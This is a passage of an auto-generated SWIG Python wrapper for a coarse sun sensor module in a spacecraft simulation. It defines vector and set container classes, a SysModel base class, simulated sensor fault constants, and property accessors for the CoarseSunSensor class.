_coarse_sun_sensor.DoubleVector_pop(self)\n\n def append(self, x):\n return 
_coarse_sun_sensor.DoubleVector_append(self, x)\n\n def empty(self):\n return _coarse_sun_sensor.DoubleVector_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.DoubleVector_size(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.DoubleVector_swap(self, v)\n\n def begin(self):\n return _coarse_sun_sensor.DoubleVector_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.DoubleVector_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.DoubleVector_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.DoubleVector_rend(self)\n\n def clear(self):\n return _coarse_sun_sensor.DoubleVector_clear(self)\n\n def get_allocator(self):\n return _coarse_sun_sensor.DoubleVector_get_allocator(self)\n\n def pop_back(self):\n return _coarse_sun_sensor.DoubleVector_pop_back(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.DoubleVector_erase(self, *args)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_DoubleVector(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def push_back(self, x):\n return _coarse_sun_sensor.DoubleVector_push_back(self, x)\n\n def front(self):\n return _coarse_sun_sensor.DoubleVector_front(self)\n\n def back(self):\n return _coarse_sun_sensor.DoubleVector_back(self)\n\n def assign(self, n, x):\n return _coarse_sun_sensor.DoubleVector_assign(self, n, x)\n\n def resize(self, *args):\n return _coarse_sun_sensor.DoubleVector_resize(self, *args)\n\n def insert(self, *args):\n return _coarse_sun_sensor.DoubleVector_insert(self, *args)\n\n def reserve(self, n):\n return _coarse_sun_sensor.DoubleVector_reserve(self, n)\n\n def capacity(self):\n return _coarse_sun_sensor.DoubleVector_capacity(self)\n __swig_destroy__ = _coarse_sun_sensor.delete_DoubleVector\n __del__ = lambda self: None\nDoubleVector_swigregister = _coarse_sun_sensor.DoubleVector_swigregister\nDoubleVector_swigregister(DoubleVector)\n\nclass StringVector(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, StringVector, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, StringVector, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.StringVector_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.StringVector___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.StringVector___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.StringVector___len__(self)\n\n def __getslice__(self, i, j):\n return _coarse_sun_sensor.StringVector___getslice__(self, i, j)\n\n def __setslice__(self, *args):\n return _coarse_sun_sensor.StringVector___setslice__(self, *args)\n\n def __delslice__(self, i, j):\n return _coarse_sun_sensor.StringVector___delslice__(self, i, j)\n\n def __delitem__(self, *args):\n return _coarse_sun_sensor.StringVector___delitem__(self, *args)\n\n def __getitem__(self, *args):\n return _coarse_sun_sensor.StringVector___getitem__(self, *args)\n\n def __setitem__(self, *args):\n return _coarse_sun_sensor.StringVector___setitem__(self, *args)\n\n def pop(self):\n return _coarse_sun_sensor.StringVector_pop(self)\n\n def append(self, x):\n return _coarse_sun_sensor.StringVector_append(self, x)\n\n def empty(self):\n return _coarse_sun_sensor.StringVector_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.StringVector_size(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.StringVector_swap(self, 
v)\n\n def begin(self):\n return _coarse_sun_sensor.StringVector_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.StringVector_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.StringVector_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.StringVector_rend(self)\n\n def clear(self):\n return _coarse_sun_sensor.StringVector_clear(self)\n\n def get_allocator(self):\n return _coarse_sun_sensor.StringVector_get_allocator(self)\n\n def pop_back(self):\n return _coarse_sun_sensor.StringVector_pop_back(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.StringVector_erase(self, *args)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_StringVector(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def push_back(self, x):\n return _coarse_sun_sensor.StringVector_push_back(self, x)\n\n def front(self):\n return _coarse_sun_sensor.StringVector_front(self)\n\n def back(self):\n return _coarse_sun_sensor.StringVector_back(self)\n\n def assign(self, n, x):\n return _coarse_sun_sensor.StringVector_assign(self, n, x)\n\n def resize(self, *args):\n return _coarse_sun_sensor.StringVector_resize(self, *args)\n\n def insert(self, *args):\n return _coarse_sun_sensor.StringVector_insert(self, *args)\n\n def reserve(self, n):\n return _coarse_sun_sensor.StringVector_reserve(self, n)\n\n def capacity(self):\n return _coarse_sun_sensor.StringVector_capacity(self)\n __swig_destroy__ = _coarse_sun_sensor.delete_StringVector\n __del__ = lambda self: None\nStringVector_swigregister = _coarse_sun_sensor.StringVector_swigregister\nStringVector_swigregister(StringVector)\n\nclass StringSet(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, StringSet, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, StringSet, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.StringSet_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.StringSet___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.StringSet___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.StringSet___len__(self)\n\n def append(self, x):\n return _coarse_sun_sensor.StringSet_append(self, x)\n\n def __contains__(self, x):\n return _coarse_sun_sensor.StringSet___contains__(self, x)\n\n def __getitem__(self, i):\n return _coarse_sun_sensor.StringSet___getitem__(self, i)\n\n def add(self, x):\n return _coarse_sun_sensor.StringSet_add(self, x)\n\n def discard(self, x):\n return _coarse_sun_sensor.StringSet_discard(self, x)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_StringSet(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def empty(self):\n return _coarse_sun_sensor.StringSet_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.StringSet_size(self)\n\n def clear(self):\n return _coarse_sun_sensor.StringSet_clear(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.StringSet_swap(self, v)\n\n def count(self, x):\n return _coarse_sun_sensor.StringSet_count(self, x)\n\n def begin(self):\n return _coarse_sun_sensor.StringSet_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.StringSet_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.StringSet_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.StringSet_rend(self)\n\n def erase(self, *args):\n return 
_coarse_sun_sensor.StringSet_erase(self, *args)\n\n def find(self, x):\n return _coarse_sun_sensor.StringSet_find(self, x)\n\n def lower_bound(self, x):\n return _coarse_sun_sensor.StringSet_lower_bound(self, x)\n\n def upper_bound(self, x):\n return _coarse_sun_sensor.StringSet_upper_bound(self, x)\n\n def equal_range(self, x):\n return _coarse_sun_sensor.StringSet_equal_range(self, x)\n\n def insert(self, __x):\n return _coarse_sun_sensor.StringSet_insert(self, __x)\n __swig_destroy__ = _coarse_sun_sensor.delete_StringSet\n __del__ = lambda self: None\nStringSet_swigregister = _coarse_sun_sensor.StringSet_swigregister\nStringSet_swigregister(StringSet)\n\nclass intSet(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, intSet, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, intSet, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.intSet_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.intSet___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.intSet___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.intSet___len__(self)\n\n def append(self, x):\n return _coarse_sun_sensor.intSet_append(self, x)\n\n def __contains__(self, x):\n return _coarse_sun_sensor.intSet___contains__(self, x)\n\n def __getitem__(self, i):\n return _coarse_sun_sensor.intSet___getitem__(self, i)\n\n def add(self, x):\n return _coarse_sun_sensor.intSet_add(self, x)\n\n def discard(self, x):\n return _coarse_sun_sensor.intSet_discard(self, x)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_intSet(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def empty(self):\n return _coarse_sun_sensor.intSet_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.intSet_size(self)\n\n def clear(self):\n return _coarse_sun_sensor.intSet_clear(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.intSet_swap(self, v)\n\n def count(self, x):\n return _coarse_sun_sensor.intSet_count(self, x)\n\n def begin(self):\n return _coarse_sun_sensor.intSet_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.intSet_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.intSet_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.intSet_rend(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.intSet_erase(self, *args)\n\n def find(self, x):\n return _coarse_sun_sensor.intSet_find(self, x)\n\n def lower_bound(self, x):\n return _coarse_sun_sensor.intSet_lower_bound(self, x)\n\n def upper_bound(self, x):\n return _coarse_sun_sensor.intSet_upper_bound(self, x)\n\n def equal_range(self, x):\n return _coarse_sun_sensor.intSet_equal_range(self, x)\n\n def insert(self, __x):\n return _coarse_sun_sensor.intSet_insert(self, __x)\n __swig_destroy__ = _coarse_sun_sensor.delete_intSet\n __del__ = lambda self: None\nintSet_swigregister = _coarse_sun_sensor.intSet_swigregister\nintSet_swigregister(intSet)\n\nclass ConstCharVector(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, ConstCharVector, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, ConstCharVector, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.ConstCharVector_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n 
return _coarse_sun_sensor.ConstCharVector___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.ConstCharVector___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.ConstCharVector___len__(self)\n\n def __getslice__(self, i, j):\n return _coarse_sun_sensor.ConstCharVector___getslice__(self, i, j)\n\n def __setslice__(self, *args):\n return _coarse_sun_sensor.ConstCharVector___setslice__(self, *args)\n\n def __delslice__(self, i, j):\n return _coarse_sun_sensor.ConstCharVector___delslice__(self, i, j)\n\n def __delitem__(self, *args):\n return _coarse_sun_sensor.ConstCharVector___delitem__(self, *args)\n\n def __getitem__(self, *args):\n return _coarse_sun_sensor.ConstCharVector___getitem__(self, *args)\n\n def __setitem__(self, *args):\n return _coarse_sun_sensor.ConstCharVector___setitem__(self, *args)\n\n def pop(self):\n return _coarse_sun_sensor.ConstCharVector_pop(self)\n\n def append(self, x):\n return _coarse_sun_sensor.ConstCharVector_append(self, x)\n\n def empty(self):\n return _coarse_sun_sensor.ConstCharVector_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.ConstCharVector_size(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.ConstCharVector_swap(self, v)\n\n def begin(self):\n return _coarse_sun_sensor.ConstCharVector_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.ConstCharVector_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.ConstCharVector_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.ConstCharVector_rend(self)\n\n def clear(self):\n return _coarse_sun_sensor.ConstCharVector_clear(self)\n\n def get_allocator(self):\n return _coarse_sun_sensor.ConstCharVector_get_allocator(self)\n\n def pop_back(self):\n return _coarse_sun_sensor.ConstCharVector_pop_back(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.ConstCharVector_erase(self, *args)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_ConstCharVector(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def push_back(self, x):\n return _coarse_sun_sensor.ConstCharVector_push_back(self, x)\n\n def front(self):\n return _coarse_sun_sensor.ConstCharVector_front(self)\n\n def back(self):\n return _coarse_sun_sensor.ConstCharVector_back(self)\n\n def assign(self, n, x):\n return _coarse_sun_sensor.ConstCharVector_assign(self, n, x)\n\n def resize(self, *args):\n return _coarse_sun_sensor.ConstCharVector_resize(self, *args)\n\n def insert(self, *args):\n return _coarse_sun_sensor.ConstCharVector_insert(self, *args)\n\n def reserve(self, n):\n return _coarse_sun_sensor.ConstCharVector_reserve(self, n)\n\n def capacity(self):\n return _coarse_sun_sensor.ConstCharVector_capacity(self)\n __swig_destroy__ = _coarse_sun_sensor.delete_ConstCharVector\n __del__ = lambda self: None\nConstCharVector_swigregister = _coarse_sun_sensor.ConstCharVector_swigregister\nConstCharVector_swigregister(ConstCharVector)\n\nclass MultiArray(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, MultiArray, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, MultiArray, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.MultiArray_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.MultiArray___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.MultiArray___bool__(self)\n\n def __len__(self):\n return 
_coarse_sun_sensor.MultiArray___len__(self)\n\n def __getslice__(self, i, j):\n return _coarse_sun_sensor.MultiArray___getslice__(self, i, j)\n\n def __setslice__(self, *args):\n return _coarse_sun_sensor.MultiArray___setslice__(self, *args)\n\n def __delslice__(self, i, j):\n return _coarse_sun_sensor.MultiArray___delslice__(self, i, j)\n\n def __delitem__(self, *args):\n return _coarse_sun_sensor.MultiArray___delitem__(self, *args)\n\n def __getitem__(self, *args):\n return _coarse_sun_sensor.MultiArray___getitem__(self, *args)\n\n def __setitem__(self, *args):\n return _coarse_sun_sensor.MultiArray___setitem__(self, *args)\n\n def pop(self):\n return _coarse_sun_sensor.MultiArray_pop(self)\n\n def append(self, x):\n return _coarse_sun_sensor.MultiArray_append(self, x)\n\n def empty(self):\n return _coarse_sun_sensor.MultiArray_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.MultiArray_size(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.MultiArray_swap(self, v)\n\n def begin(self):\n return _coarse_sun_sensor.MultiArray_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.MultiArray_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.MultiArray_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.MultiArray_rend(self)\n\n def clear(self):\n return _coarse_sun_sensor.MultiArray_clear(self)\n\n def get_allocator(self):\n return _coarse_sun_sensor.MultiArray_get_allocator(self)\n\n def pop_back(self):\n return _coarse_sun_sensor.MultiArray_pop_back(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.MultiArray_erase(self, *args)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_MultiArray(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def push_back(self, x):\n return _coarse_sun_sensor.MultiArray_push_back(self, x)\n\n def front(self):\n return _coarse_sun_sensor.MultiArray_front(self)\n\n def back(self):\n return _coarse_sun_sensor.MultiArray_back(self)\n\n def assign(self, n, x):\n return _coarse_sun_sensor.MultiArray_assign(self, n, x)\n\n def resize(self, *args):\n return _coarse_sun_sensor.MultiArray_resize(self, *args)\n\n def insert(self, *args):\n return _coarse_sun_sensor.MultiArray_insert(self, *args)\n\n def reserve(self, n):\n return _coarse_sun_sensor.MultiArray_reserve(self, n)\n\n def capacity(self):\n return _coarse_sun_sensor.MultiArray_capacity(self)\n __swig_destroy__ = _coarse_sun_sensor.delete_MultiArray\n __del__ = lambda self: None\nMultiArray_swigregister = _coarse_sun_sensor.MultiArray_swigregister\nMultiArray_swigregister(MultiArray)\n\nclass CSSVector(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, CSSVector, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, CSSVector, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.CSSVector_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.CSSVector___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.CSSVector___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.CSSVector___len__(self)\n\n def __getslice__(self, i, j):\n return _coarse_sun_sensor.CSSVector___getslice__(self, i, j)\n\n def __setslice__(self, *args):\n return _coarse_sun_sensor.CSSVector___setslice__(self, *args)\n\n def __delslice__(self, i, j):\n return _coarse_sun_sensor.CSSVector___delslice__(self, i, j)\n\n def 
__delitem__(self, *args):\n return _coarse_sun_sensor.CSSVector___delitem__(self, *args)\n\n def __getitem__(self, *args):\n return _coarse_sun_sensor.CSSVector___getitem__(self, *args)\n\n def __setitem__(self, *args):\n return _coarse_sun_sensor.CSSVector___setitem__(self, *args)\n\n def pop(self):\n return _coarse_sun_sensor.CSSVector_pop(self)\n\n def append(self, x):\n return _coarse_sun_sensor.CSSVector_append(self, x)\n\n def empty(self):\n return _coarse_sun_sensor.CSSVector_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.CSSVector_size(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.CSSVector_swap(self, v)\n\n def begin(self):\n return _coarse_sun_sensor.CSSVector_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.CSSVector_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.CSSVector_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.CSSVector_rend(self)\n\n def clear(self):\n return _coarse_sun_sensor.CSSVector_clear(self)\n\n def get_allocator(self):\n return _coarse_sun_sensor.CSSVector_get_allocator(self)\n\n def pop_back(self):\n return _coarse_sun_sensor.CSSVector_pop_back(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.CSSVector_erase(self, *args)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_CSSVector(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def push_back(self, x):\n return _coarse_sun_sensor.CSSVector_push_back(self, x)\n\n def front(self):\n return _coarse_sun_sensor.CSSVector_front(self)\n\n def back(self):\n return _coarse_sun_sensor.CSSVector_back(self)\n\n def assign(self, n, x):\n return _coarse_sun_sensor.CSSVector_assign(self, n, x)\n\n def resize(self, *args):\n return _coarse_sun_sensor.CSSVector_resize(self, *args)\n\n def insert(self, *args):\n return _coarse_sun_sensor.CSSVector_insert(self, *args)\n\n def reserve(self, n):\n return _coarse_sun_sensor.CSSVector_reserve(self, n)\n\n def capacity(self):\n return _coarse_sun_sensor.CSSVector_capacity(self)\n __swig_destroy__ = _coarse_sun_sensor.delete_CSSVector\n __del__ = lambda self: None\nCSSVector_swigregister = _coarse_sun_sensor.CSSVector_swigregister\nCSSVector_swigregister(CSSVector)\n\nclass SysModel(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, SysModel, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, SysModel, name)\n __repr__ = _swig_repr\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_SysModel(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n __swig_destroy__ = _coarse_sun_sensor.delete_SysModel\n __del__ = lambda self: None\n\n def SelfInit(self):\n return _coarse_sun_sensor.SysModel_SelfInit(self)\n\n def CrossInit(self):\n return _coarse_sun_sensor.SysModel_CrossInit(self)\n\n def IntegratedInit(self):\n return _coarse_sun_sensor.SysModel_IntegratedInit(self)\n\n def UpdateState(self, CurrentSimNanos):\n return _coarse_sun_sensor.SysModel_UpdateState(self, CurrentSimNanos)\n\n def Reset(self, CurrentSimNanos):\n return _coarse_sun_sensor.SysModel_Reset(self, CurrentSimNanos)\n __swig_setmethods__[\"ModelTag\"] = _coarse_sun_sensor.SysModel_ModelTag_set\n __swig_getmethods__[\"ModelTag\"] = _coarse_sun_sensor.SysModel_ModelTag_get\n if _newclass:\n ModelTag = _swig_property(_coarse_sun_sensor.SysModel_ModelTag_get, _coarse_sun_sensor.SysModel_ModelTag_set)\n __swig_setmethods__[\"CallCounts\"] = 
_coarse_sun_sensor.SysModel_CallCounts_set\n __swig_getmethods__[\"CallCounts\"] = _coarse_sun_sensor.SysModel_CallCounts_get\n if _newclass:\n CallCounts = _swig_property(_coarse_sun_sensor.SysModel_CallCounts_get, _coarse_sun_sensor.SysModel_CallCounts_set)\n __swig_setmethods__[\"RNGSeed\"] = _coarse_sun_sensor.SysModel_RNGSeed_set\n __swig_getmethods__[\"RNGSeed\"] = _coarse_sun_sensor.SysModel_RNGSeed_get\n if _newclass:\n RNGSeed = _swig_property(_coarse_sun_sensor.SysModel_RNGSeed_get, _coarse_sun_sensor.SysModel_RNGSeed_set)\n __swig_setmethods__[\"moduleID\"] = _coarse_sun_sensor.SysModel_moduleID_set\n __swig_getmethods__[\"moduleID\"] = _coarse_sun_sensor.SysModel_moduleID_get\n if _newclass:\n moduleID = _swig_property(_coarse_sun_sensor.SysModel_moduleID_get, _coarse_sun_sensor.SysModel_moduleID_set)\nSysModel_swigregister = _coarse_sun_sensor.SysModel_swigregister\nSysModel_swigregister(SysModel)\n\nCSSFAULT_OFF = _coarse_sun_sensor.CSSFAULT_OFF\nCSSFAULT_STUCK_CURRENT = _coarse_sun_sensor.CSSFAULT_STUCK_CURRENT\nCSSFAULT_STUCK_MAX = _coarse_sun_sensor.CSSFAULT_STUCK_MAX\nCSSFAULT_STUCK_RAND = _coarse_sun_sensor.CSSFAULT_STUCK_RAND\nCSSFAULT_STUCK = _coarse_sun_sensor.CSSFAULT_STUCK\nCSSFAULT_RAND = _coarse_sun_sensor.CSSFAULT_RAND\nMAX_CSSFAULT = _coarse_sun_sensor.MAX_CSSFAULT\nclass CoarseSunSensor(SysModel):\n __swig_setmethods__ = {}\n for _s in [SysModel]:\n __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))\n __setattr__ = lambda self, name, value: _swig_setattr(self, CoarseSunSensor, name, value)\n __swig_getmethods__ = {}\n for _s in [SysModel]:\n __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))\n __getattr__ = lambda self, name: _swig_getattr(self, CoarseSunSensor, name)\n __repr__ = _swig_repr\n __swig_destroy__ = _coarse_sun_sensor.delete_CoarseSunSensor\n __del__ = lambda self: None\n\n def CrossInit(self):\n return _coarse_sun_sensor.CoarseSunSensor_CrossInit(self)\n\n def SelfInit(self):\n return _coarse_sun_sensor.CoarseSunSensor_SelfInit(self)\n\n def UpdateState(self, CurrentSimNanos):\n return _coarse_sun_sensor.CoarseSunSensor_UpdateState(self, CurrentSimNanos)\n\n def setUnitDirectionVectorWithPerturbation(self, cssThetaPerturb, cssPhiPerturb):\n return _coarse_sun_sensor.CoarseSunSensor_setUnitDirectionVectorWithPerturbation(self, cssThetaPerturb, cssPhiPerturb)\n\n def setBodyToPlatformDCM(self, yaw, pitch, roll):\n return _coarse_sun_sensor.CoarseSunSensor_setBodyToPlatformDCM(self, yaw, pitch, roll)\n\n def readInputMessages(self):\n return _coarse_sun_sensor.CoarseSunSensor_readInputMessages(self)\n\n def computeSunData(self):\n return _coarse_sun_sensor.CoarseSunSensor_computeSunData(self)\n\n def computeTrueOutput(self):\n return _coarse_sun_sensor.CoarseSunSensor_computeTrueOutput(self)\n\n def applySensorErrors(self):\n return _coarse_sun_sensor.CoarseSunSensor_applySensorErrors(self)\n\n def scaleSensorValues(self):\n return _coarse_sun_sensor.CoarseSunSensor_scaleSensorValues(self)\n\n def applySaturation(self):\n return _coarse_sun_sensor.CoarseSunSensor_applySaturation(self)\n\n def writeOutputMessages(self, Clock):\n return _coarse_sun_sensor.CoarseSunSensor_writeOutputMessages(self, Clock)\n __swig_setmethods__[\"sunInMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_sunInMsgName_set\n __swig_getmethods__[\"sunInMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_sunInMsgName_get\n if _newclass:\n sunInMsgName = _swig_property(_coarse_sun_sensor.CoarseSunSensor_sunInMsgName_get, 
_coarse_sun_sensor.CoarseSunSensor_sunInMsgName_set)\n __swig_setmethods__[\"stateInMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_stateInMsgName_set\n __swig_getmethods__[\"stateInMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_stateInMsgName_get\n if _newclass:\n stateInMsgName = _swig_property(_coarse_sun_sensor.CoarseSunSensor_stateInMsgName_get, _coarse_sun_sensor.CoarseSunSensor_stateInMsgName_set)\n __swig_setmethods__[\"cssDataOutMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_cssDataOutMsgName_set\n __swig_getmethods__[\"cssDataOutMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_cssDataOutMsgName_get\n if _newclass:\n cssDataOutMsgName = _swig_property(_coarse_sun_sensor.CoarseSunSensor_cssDataOutMsgName_get, _coarse_sun_sensor.CoarseSunSensor_cssDataOutMsgName_set)\n __swig_setmethods__[\"sunEclipseInMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_sunEclipseInMsgName_set\n __swig_getmethods__[\"sunEclipseInMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_sunEclipseInMsgName_get\n if _newclass:\n sunEclipseInMsgName = _swig_property(_coarse_sun_sensor.CoarseSunSensor_sunEclipseInMsgName_get, _coarse_sun_sensor.CoarseSunSensor_sunEclipseInMsgName_set)\n __swig_setmethods__[\"faultState\"] = _coarse_sun_sensor.CoarseSunSensor_faultState_set\n __swig_getmethods__[\"faultState\"] = _coarse_sun_sensor.CoarseSunSensor_faultState_get\n if _newclass:\n faultState = _swig_property(_coarse_sun_sensor.CoarseSunSensor_faultState_get, _coarse_sun_sensor.CoarseSunSensor_faultState_set)\n __swig_setmethods__[\"theta\"] = _coarse_sun_sensor.CoarseSunSensor_theta_set\n __swig_getmethods__[\"theta\"] = _coarse_sun_sensor.CoarseSunSensor_theta_get\n if _newclass:\n theta = _swig_property(_coarse_sun_sensor.CoarseSunSensor_theta_get, _coarse_sun_sensor.CoarseSunSensor_theta_set)\n __swig_setmethods__[\"phi\"] = _coarse_sun_sensor.CoarseSunSensor_phi_set\n __swig_getmethods__[\"phi\"] = _coarse_sun_sensor.CoarseSunSensor_phi_get\n if _newclass:\n phi = _swig_property(_coarse_sun_sensor.CoarseSunSensor_phi_get, _coarse_sun_sensor.CoarseSunSensor_phi_set)\n __swig_setmethods__[\"B2P321Angles\"] = _coarse_sun_sensor.CoarseSunSensor_B2P321Angles_set\n __swig_getmethods__[\"B2P321Angles\"] = _coarse_sun_sensor.CoarseSunSensor_B2P321Angles_get\n if _newclass:\n B2P321Angles = _swig_property(_coarse_sun_sensor.CoarseSunSensor_B2P321Angles_get, _coarse_sun_sensor.CoarseSunSensor_B2P321Angles_set)\n __swig_setmethods__[\"dcm_PB\"] = _coarse_sun_sensor.CoarseSunSensor_dcm_PB_set\n __swig_getmethods__[\"dcm_PB\"] = _coarse_sun_sensor.CoarseSunSensor_dcm_PB_get\n if _newclass:\n dcm_PB = _swig_property(_coarse_sun_sensor.CoarseSunSensor_dcm_PB_get, _coarse_sun_sensor.CoarseSunSensor_dcm_PB_set)\n __swig_setmethods__[\"nHat_B\"] = _coarse_sun_sensor.CoarseSunSensor_nHat_B_set\n __swig_getmethods__[\"nHat_B\"] = _coarse_sun_sensor.CoarseSunSensor_nHat_B_get\n if _newclass:\n nHat_B = _swig_property(_coarse_sun_sensor.CoarseSunSensor_nHat_B_get, _coarse_sun_sensor.CoarseSunSensor_nHat_B_set)\n __swig_setmethods__[\"sHat_B\"] = _coarse_sun_sensor.CoarseSunSensor_sHat_B_set\n __swig_getmethods__[\"sHat_B\"] = _coarse_sun_sensor.CoarseSunSensor_sHat_B_get\n if _newclass:\n sHat_B = _swig_property(_coarse_sun_sensor.CoarseSunSensor_sHat_B_get, _coarse_sun_sensor.CoarseSunSensor_sHat_B_set)\n __swig_setmethods__[\"directValue\"] = _coarse_sun_sensor.CoarseSunSensor_directValue_set\n __swig_getmethods__[\"directValue\"] = _coarse_sun_sensor.CoarseSunSensor_directValue_get\n if _newclass:\n directValue = 
